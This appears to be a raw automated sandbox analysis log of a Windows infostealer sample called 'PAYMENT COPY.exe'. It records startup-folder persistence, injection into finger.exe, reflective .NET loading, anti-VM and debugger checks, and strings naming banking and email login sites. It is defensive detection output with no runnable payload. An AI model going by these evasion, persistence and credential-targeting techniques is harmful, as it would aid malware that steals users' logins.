Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PAYMENT COPY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PAYMENT COPY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: finger.pdb source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054440794.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000001.00000002.1159408870.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000004.00000003.1164033502.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.000000000370E000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3353245951.0000000003570000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000004.00000003.1159233310.000000000320D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: PAYMENT COPY.exe, 00000000.00000002.1054326763.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003701000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1325090938.0000000003688000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BMYdhGJqo1.exe, 00000003.00000000.1079377256.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BMYdhGJqo1.exe, 00000008.00000000.1229141542.000000000070F000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: finger.pdbGCTL source: PAYMENT COPY.exe, 00000001.00000002.1159114036.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, BMYdhGJqo1.exe, 00000003.00000002.3350106221.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: PAYMENT COPY.exe, JoinedAuthorizer.cs | .Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
Source: HashSize.exe.0.dr, JoinedAuthorizer.cs | .Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 0.2.PAYMENT COPY.exe.5d10000.5.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 0.2.PAYMENT COPY.exe.5d60000.6.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: 0.2.PAYMENT COPY.exe.3c23fd0.0.raw.unpack, JoinedAuthorizer.cs | .Net Code: AuthorizeSortedAuthorizer System.AppDomain.Load(byte[])
Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
Source: 6.2.HashSize.exe.3701590.0.raw.unpack, ListDecorator.cs | .Net Code: Read
Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
Source: 6.2.HashSize.exe.3701590.0.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
Source: 6.2.HashSize.exe.3b29400.3.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
Source: Yara match | File source: 6.2.HashSize.exe.38ec6f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.HashSize.exe.3a449c0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.HashSize.exe.39451d1.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PAYMENT COPY.exe.5bd0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.HashSize.exe.39451d1.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PAYMENT COPY.exe.5bd0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.HashSize.exe.3a449c0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1054007496.0000000005BD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1325090938.000000000381D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1325090938.0000000003A44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PAYMENT COPY.exe PID: 7040, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: HashSize.exe PID: 6792, type: MEMORYSTR
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 0_2_02770DF5 push E9000000h; ret 0_2_02770DFF
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 0_2_064E31A2 push edi; iretd 0_2_064E31A3
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 0_2_064E3DA3 push esi; ret 0_2_064E3DA4
Source: C:\Users\user\Desktop\PAYMENT COPY.exe | Code function: 1_2_004014F0 push FFFFFF89h; retn D8D9h 1_2_00401A97
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004014F0 push ebx; retn F2A0h1_2_00401B60
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0042D963 push edi; iretd 1_2_0042D96C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00407109 push cs; iretd 1_2_0040710B
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004149E2 push edi; retf 1_2_004149E3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00406365 push ebx; ret 1_2_00406366
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00403370 push eax; ret 1_2_00403372
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00417E8E push ebx; iretd 1_2_00417E90
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00414F55 push 00000079h; retf 1_2_00414F57
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040D75B push ss; ret 1_2_0040D760
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0041870B pushad ; retf 1_2_0041870C
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0041AF95 push esi; iretd 1_2_0041AF97
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA225F pushad ; ret 1_2_00FA27F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA27FA pushad ; ret 1_2_00FA27F9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA283D push eax; iretd 1_2_00FA2858
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD09AD push ecx; mov dword ptr [esp], ecx1_2_00FD09B6
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FA1366 push eax; iretd 1_2_00FA1369
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363E2EC push cs; iretd 3_2_0363E2EE
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_03652178 push esi; iretd 3_2_0365217A
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364493E push ss; ret 3_2_03644943
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364C138 push 00000079h; retf 3_2_0364C13A
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364F071 push ebx; iretd 3_2_0364F073
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364F8EE pushad ; retf 3_2_0364F8EF
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364D8A3 push ds; iretd 3_2_0364D8A4
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0363D548 push ebx; ret 3_2_0363D549
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exeCode function: 3_2_0364D503 push ebx; retf 3_2_0364D50C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_0357225F pushad ; ret 4_2_035727F9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4_2_035727FA pushad ; ret 4_2_035727F9
                      Source: 0.2.PAYMENT COPY.exe.57a0000.2.raw.unpack, F7YlVYACjwgFlLpokwm.csHigh entropy of concatenated method names: 'Hv6AYYnFiA', 'vfbAxgL5BT', 'eCAAfcKDVF', 'qkMAN0Vjhk', 'bqpAhS1Sny', 'PTKA5bNNhS', 'jq0AGAA4wZ', 'NNGA9W9hvZ', 'omSAcl6JAE', 'owfA09u4KB'
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Roaming\HashSize.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\finger.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: PAYMENT COPY.exe PID: 7040, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: HashSize.exe PID: 6792, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED324
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED7E4
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED944
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED504
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED544
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424ED1E4
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424F0154
                      Source: C:\Windows\SysWOW64\finger.exe API/Special instruction interceptor: Address: 7FFA424EDA44
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027702847.00000000029CF000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Memory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Memory allocated: 29A0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Memory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Memory allocated: D90000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Memory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Memory allocated: 2400000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_010A21AE rdtsc 1_2_010A21AE
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\finger.exe Window / User API: threadDelayed 2245
                      Source: C:\Windows\SysWOW64\finger.exe Window / User API: threadDelayed 7726
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe API coverage: 0.8 %
                      Source: C:\Windows\SysWOW64\finger.exe API coverage: 2.9 %
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328 Thread sleep count: 2245 > 30
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328 Thread sleep time: -4490000s >= -30000s
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328 Thread sleep count: 7726 > 30
                      Source: C:\Windows\SysWOW64\finger.exe TID: 2328 Thread sleep time: -15452000s >= -30000s
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188 Thread sleep time: -85000s >= -30000s
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188 Thread sleep count: 39 > 30
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188 Thread sleep time: -58500s >= -30000s
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188 Thread sleep count: 42 > 30
                      Source: C:\Program Files (x86)\WYbaSkuKKrHGWltywOsHLlcjIrqbXkAizUAFfQKYlccE\BMYdhGJqo1.exe TID: 3188 Thread sleep time: -42000s >= -30000s
                      Source: C:\Windows\SysWOW64\finger.exe Last function: Thread delayed
                      Source: C:\Windows\SysWOW64\finger.exe Code function: 4_2_02BBCB70 FindFirstFileW,FindNextFileW,FindClose, 4_2_02BBCB70
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: dev.azure.comVMware20,11696497155j
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: global block list test formVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: HashSize.exe, 00000006.00000002.1271346934.0000000000852000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCCa
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: tasks.office.comVMware20,11696497155o
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: PAYMENT COPY.exe, 00000000.00000002.1027023009.0000000000889000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000004.00000002.3348989479.0000000002FAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: wscript.exe, 00000005.00000002.1134527138.0000022BF4F24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: BMYdhGJqo1.exe, 00000008.00000002.3350372430.0000000000B29000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: wscript.exe, 00000005.00000002.1134527138.0000022BF4F24000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: finger.exe, 00000004.00000002.3353879564.00000000053EE000.00000004.10000000.00040000.00000000.sdmp, BMYdhGJqo1.exe, 00000008.00000002.3353285344.000000000432E000.00000004.00000001.00040000.00000000.sdmp Binary or memory string: <p><a href="https://www.star.ne.jp/"><img src="data:image/gif;base64,
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: firefox.exe, 00000010.00000002.1458178504.000002E1FD98C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT%
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: AMC password management pageVMware20,11696497155
                      Source: HashSize.exe, 00000006.00000002.1278877272.00000000026AE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: discord.comVMware20,11696497155f
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: outlook.office.comVMware20,11696497155s
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: 4ub-1K1Qxn.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Process queried: DebugPort
                      Source: C:\Windows\SysWOW64\finger.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\HashSize.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_010A21AE rdtsc 1_2_010A21AE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_00417E13 LdrLoadDll, 1_2_00417E13
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_0107E10E mov eax, dword ptr fs:[00000030h] 1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_0107E10E mov ecx, dword ptr fs:[00000030h] 1_2_0107E10E
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_00FCC0F0 mov eax, dword ptr fs:[00000030h] 1_2_00FCC0F0
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_00FD80E9 mov eax, dword ptr fs:[00000030h] 1_2_00FD80E9
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_01090115 mov eax, dword ptr fs:[00000030h] 1_2_01090115
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_00FCA0E3 mov ecx, dword ptr fs:[00000030h] 1_2_00FCA0E3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_0107A118 mov ecx, dword ptr fs:[00000030h] 1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_0107A118 mov eax, dword ptr fs:[00000030h] 1_2_0107A118
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_01000124 mov eax, dword ptr fs:[00000030h] 1_2_01000124
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exe Code function: 1_2_01064144 mov eax, dword ptr fs:[00000030h] 1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov ecx, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01064144 mov eax, dword ptr fs:[00000030h]1_2_01064144
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01068158 mov eax, dword ptr fs:[00000030h]1_2_01068158
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4164 mov eax, dword ptr fs:[00000030h]1_2_010A4164
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A4164 mov eax, dword ptr fs:[00000030h]1_2_010A4164
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD208A mov eax, dword ptr fs:[00000030h]1_2_00FD208A
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C188 mov eax, dword ptr fs:[00000030h]1_2_0108C188
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0108C188 mov eax, dword ptr fs:[00000030h]1_2_0108C188
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01010185 mov eax, dword ptr fs:[00000030h]1_2_01010185
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074180 mov eax, dword ptr fs:[00000030h]1_2_01074180
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_01074180 mov eax, dword ptr fs:[00000030h]1_2_01074180
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FFC073 mov eax, dword ptr fs:[00000030h]1_2_00FFC073
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0105019F mov eax, dword ptr fs:[00000030h]1_2_0105019F
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010A21AE mov eax, dword ptr fs:[00000030h]1_2_010A21AE
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00FD2050 mov eax, dword ptr fs:[00000030h]1_2_00FD2050
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010961C3 mov eax, dword ptr fs:[00000030h]1_2_010961C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_010961C3 mov eax, dword ptr fs:[00000030h]1_2_010961C3
                      Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0104E1D0 mov eax, dword ptr fs:[00000030h]1_2_0104E1D0
